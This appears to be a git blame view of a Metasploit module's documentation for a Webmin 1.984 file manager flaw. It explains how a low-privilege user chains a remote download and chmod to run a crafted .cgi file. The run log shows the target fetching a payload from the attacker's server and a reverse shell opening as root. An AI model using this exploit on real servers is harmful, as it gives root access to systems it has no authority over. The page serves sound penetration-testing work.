2022-10-24 18:53:21 -04:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
2022-10-25 15:12:26 -04:00
|
|
|
In Webmin v1.984, any authenticated low privilege user without access rights to the
|
|
|
|
|
File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing
|
|
|
|
|
file permissions (chmod). It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those
|
2022-10-24 18:53:21 -04:00
|
|
|
functionalities in the file manager.
|
|
|
|
|
|
|
|
|
|
### Setup, on Ubuntu 20.04
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
wget https://download.webmin.com/devel/deb/webmin_1.984_all.deb
|
|
|
|
|
sudo dpkg -i webmin_1.984_all.deb
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Webmin should now be installed. The credentials for the web UI will be the same as the
|
|
|
|
|
user that installed Webmin
|
|
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
### USERNAME
|
|
|
|
|
A specific username to authenticate as
|
|
|
|
|
### PASSWORD
|
|
|
|
|
A specific password to authenticate with
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Start msfconsole
|
2022-10-25 15:12:03 -04:00
|
|
|
1. Do: `use exploit/linux/http/webmin_file_manager_rce`
|
2022-10-24 18:53:21 -04:00
|
|
|
1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
|
|
|
|
|
1. Run the module
|
|
|
|
|
1. Receive a session as the `root` user.
|
|
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
### Webmin 1.984, on Ubuntu 20.04
|
|
|
|
|
|
|
|
|
|
```
|
2025-07-17 09:53:40 +01:00
|
|
|
msf > exploit/linux/http/webmin_file_manager_rce
|
2022-10-24 18:53:21 -04:00
|
|
|
[*] Using exploit/linux/http/webmin_file_manager_rce
|
2025-07-17 09:53:40 +01:00
|
|
|
msf exploit(linux/http/webmin_file_manager_rce) > set password notpassword
|
2022-10-24 18:53:21 -04:00
|
|
|
password => notpassword
|
2025-07-17 09:53:40 +01:00
|
|
|
msf exploit(linux/http/webmin_file_manager_rce) > set lhost 172.16.199.1
|
2022-10-24 18:53:21 -04:00
|
|
|
lhost => 172.16.199.1
|
2025-07-17 09:53:40 +01:00
|
|
|
msf exploit(linux/http/webmin_file_manager_rce) > set rhosts 172.16.199.132
|
2022-10-24 18:53:21 -04:00
|
|
|
rhosts => 172.16.199.132
|
2025-07-17 09:53:40 +01:00
|
|
|
msf exploit(linux/http/webmin_file_manager_rce) > set username msfuser
|
2022-10-24 18:53:21 -04:00
|
|
|
username => msfuser
|
2025-07-17 09:53:40 +01:00
|
|
|
msf exploit(linux/http/webmin_file_manager_rce) > run
|
2022-10-24 18:53:21 -04:00
|
|
|
|
|
|
|
|
[*] Started reverse TCP handler on 172.16.199.1:4444
|
|
|
|
|
[*] Running automatic check ("set AutoCheck false" to disable)
|
|
|
|
|
[+] The target appears to be vulnerable.
|
2022-10-25 16:24:27 -04:00
|
|
|
[*] Using URL: http://172.16.199.1:8080/tmBFT82mvsHD
|
2022-10-24 18:53:21 -04:00
|
|
|
[*] Attempting to authenticate with Webmin
|
|
|
|
|
[+] Authentication successful
|
|
|
|
|
[*] Downloading remote url
|
|
|
|
|
[*] Fetching payload from HTTP server
|
2022-10-25 16:24:27 -04:00
|
|
|
[*] Request 'GET /tmBFT82mvsHD.cgi'
|
2022-10-24 18:53:21 -04:00
|
|
|
[*] Sending payload ...
|
2022-10-25 16:24:27 -04:00
|
|
|
[*] Finished downloading remote url
|
2022-10-24 18:53:21 -04:00
|
|
|
[*] Modifying the permissions of the uploaded payload to 0755
|
2022-10-25 16:24:27 -04:00
|
|
|
[+] Deleted /usr/share/webmin/tmBFT82mvsHD.cgi
|
|
|
|
|
[*] Command shell session 9 opened (172.16.199.1:4444 -> 172.16.199.132:58058) at 2022-10-25 16:21:02 -0400
|
2022-10-24 18:53:21 -04:00
|
|
|
[*] Server stopped.
|
|
|
|
|
|
|
|
|
|
id
|
|
|
|
|
uid=0(root) gid=0(root) groups=0(root)
|
|
|
|
|
uname -a
|
|
|
|
|
Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
|
|
|
|
|
```
|
